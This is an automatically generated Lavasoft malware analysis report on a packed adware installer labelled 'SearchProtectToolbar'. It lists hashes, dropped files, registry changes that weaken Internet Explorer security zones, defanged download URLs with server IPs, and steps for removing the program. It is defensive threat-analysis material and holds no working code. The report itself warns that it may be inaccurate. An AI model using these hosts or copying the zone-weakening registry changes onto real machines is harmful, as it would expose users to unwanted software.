SearchProtectToolbar_pcap.YR (Lavasoft MAS)
Behaviour: Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 46fc3421f4adad3425ab6ef32d0c4355
SHA1: 5504bfa51de599a7235db39c8a45f419410a1742
SHA256: 069013029d890dbf847d052b0a8d97dd767486714f90d2cbec90174285448500
SSDeep: 24576:q4ysm2dkoSBaU9jILdudWwt684PHRql4llRD/NnI:0sLXhU9jIIdZ8PlRu
Size: 891496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Cash Buyer Media
Created at: 2014-11-29 18:26:06
Analyzed on: WindowsXP SP3 32-bit
Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
%original file name%.exe:928
%original file name%.exe:312
%original file name%.exe:580
The Malware injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:928 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\149\arcadetwist_playthru_pcprocleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.psd (42457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\knockout.js (2039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\SsaBz1bCz1Ttz1fGhI67jKCcLl67aBuVXx (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\lua51.dll (3579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\save.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\kLoPVvrSyZOofGUugHSsEez1.dll (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\back.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\29pXHmrN9h.dll (1486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\yZvWSsXxcDUukLwXNnrSdEbC90vWFf90iJ.dll (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\main.css (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\.DS_Store (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_bg.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progressPause.gif (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\close.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iconChe.gif (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\knockout-2.js (10370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\173\tidynetwork_playthru_propccleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\177\tidy_playthru_onesystemcare_triple_628_3.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\do_tracking_hit.lua (913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\default_logo.png (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\decline.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\run.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\169\knctr_playthru_tidy_triple_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreenParamete.js (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\AutoFeatureMod.js (386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\153\arcadetwist_knctr_playthru_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.js (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\index.html (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_off.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress.gif (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\145\arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin.zip (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\next.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skipall.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wbk2.tmp (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress-bar.gif (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_on.png (999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\minify.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\jquery.js (1843 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\183\playthru_tidy_double_628_3.mht (8844 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\161\knctr_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\adknowledge_3.mht (7772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\cancel.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept-lg.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\181\onesystemcare_tidy_double628.mht (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1Oz0QVgBf.dll (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\141\arcadetwist_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\165\knctr_playthru_tidy_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\options.json (197 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wbk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\AutoFeatureMod.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iconChe.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\knockout-2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreenParamete.js (0 bytes)
Registry activity
The process %original file name%.exe:928 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015121520151216\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 BE 6A CC A6 4A 4A 0C C7 50 E3 D2 B7 C4 44 41"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CacheRepair" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CachePrefix" = ":2015121520151216:"
The Malware modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Malware modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Malware modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Malware deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]
The Malware deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:312 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 0C D6 82 80 F3 1F DB 9C 1E 51 DF 00 E8 56 52"
The process %original file name%.exe:580 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 40 80 AB 58 96 43 CE E9 74 B9 5C 37 B5 81 24"
Dropped PE files
MD5 | File path |
---|---|
a55240c71fbcfa83273a3b853e323b38 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\1Oz0QVgBf.dll |
ef9b5304e4469137c5290b70ef0b7ec9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\29pXHmrN9h.dll |
5f13dbc378792f23e598079fc1e4422b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\kLoPVvrSyZOofGUugHSsEez1.dll |
f0c59526f8186eadaf2171b8fd2967c1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\lua51.dll |
44dac7f87bdf94d553f8d2cf073d605d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\yZvWSsXxcDUukLwXNnrSdEbC90vWFf90iJ.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:928
%original file name%.exe:312
%original file name%.exe:580
- Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\149\arcadetwist_playthru_pcprocleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.psd (42457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\knockout.js (2039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\SsaBz1bCz1Ttz1fGhI67jKCcLl67aBuVXx (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\lua51.dll (3579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\save.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\kLoPVvrSyZOofGUugHSsEez1.dll (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\back.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\29pXHmrN9h.dll (1486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\yZvWSsXxcDUukLwXNnrSdEbC90vWFf90iJ.dll (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\main.css (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\.DS_Store (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_bg.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progressPause.gif (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\close.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iconChe.gif (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\knockout-2.js (10370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\173\tidynetwork_playthru_propccleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\177\tidy_playthru_onesystemcare_triple_628_3.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\do_tracking_hit.lua (913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\default_logo.png (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\decline.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\run.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\169\knctr_playthru_tidy_triple_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreenParamete.js (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\AutoFeatureMod.js (386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\153\arcadetwist_knctr_playthru_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.js (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\index.html (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_off.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress.gif (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\145\arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin.zip (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\next.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skipall.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wbk2.tmp (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress-bar.gif (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_on.png (999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\minify.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\jquery.js (1843 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\183\playthru_tidy_double_628_3.mht (8844 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\161\knctr_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\adknowledge_3.mht (7772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\cancel.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept-lg.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\181\onesystemcare_tidy_double628.mht (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1Oz0QVgBf.dll (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\141\arcadetwist_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\165\knctr_playthru_tidy_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\options.json (197 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: Cash Buyer Media
Product Name: Cash Buyer Media
Product Version: 61.6.7.6620
Legal Copyright: Copyright (C) 2015
Legal Trademarks:
Original Filename: setup.exe
Internal Name: setup.exe
File Version: 61.6.7.6620
File Description: Cash Buyer Media
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 53435 | 53760 | 4.46112 | 59445157f5b2aa9117c7ab9d4fab4baf |
.rdata | 61440 | 7748 | 8192 | 3.72529 | 5d0d3053677fc3822c5caecd2b9d6e2d |
.data | 69632 | 16284 | 12800 | 5.23114 | ced9c3e2e405f9ce97f0b5abec5b067d |
.rsrc | 86016 | 6920 | 7168 | 3.1693 | be528cfb1576d557d291904a2817b4e2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 21
Network Activity
URLs
URL | IP |
---|---|
hxxp://service.downloadadmin.com/checksuminstall?checksum=17679 | 50.22.63.140 |
hxxp://a728.g.akamai.net/skins/da/11122015/megazord_darkskin_nondlm_cancel.zip | |
hxxp://service.downloadadmin.com/env?browserVersion=11&osVersion=7&browserName=IE&c=fw35&variation=&pid=adknowledge&aid=adk&country=US&productKey=&s=fw35_300x250display5128768&brand=adknowledge.com&bc=1197303&osName=Windows | 50.22.63.140 |
hxxp://a728.g.akamai.net/binstallers/BM2/adknowledge/ipage/adknowledge_3.mht | |
hxxp://a728.g.akamai.net/binstallers/BM2/api/do_tracking_hit.lua | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_playthru_onesystemcare_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_playthru_pcprocleaner_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_knctr_playthru_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/knctr_playthru_onesystemcare_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/knctr_playthru_tidy_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/knctr_playthru_tidy_triple_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/tidynetwork_playthru_propccleaner_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/tidy_playthru_onesystemcare_triple_628_3.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/onesystemcare_tidy_double628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/playthru_tidy_double_628_3.mht | |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/onesystemcare_tidy_double628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/knctr_playthru_tidy_triple_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/playthru_tidy_double_628_3.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/tidy_playthru_onesystemcare_triple_628_3.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/skins/da/11122015/megazord_darkskin_nondlm_cancel.zip | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_playthru_onesystemcare_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/knctr_playthru_onesystemcare_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_knctr_playthru_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/knctr_playthru_tidy_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/binstallers/BM2/adknowledge/ipage/adknowledge_3.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/tidynetwork_playthru_propccleaner_updateadmin_628.mht | 213.133.184.112 |
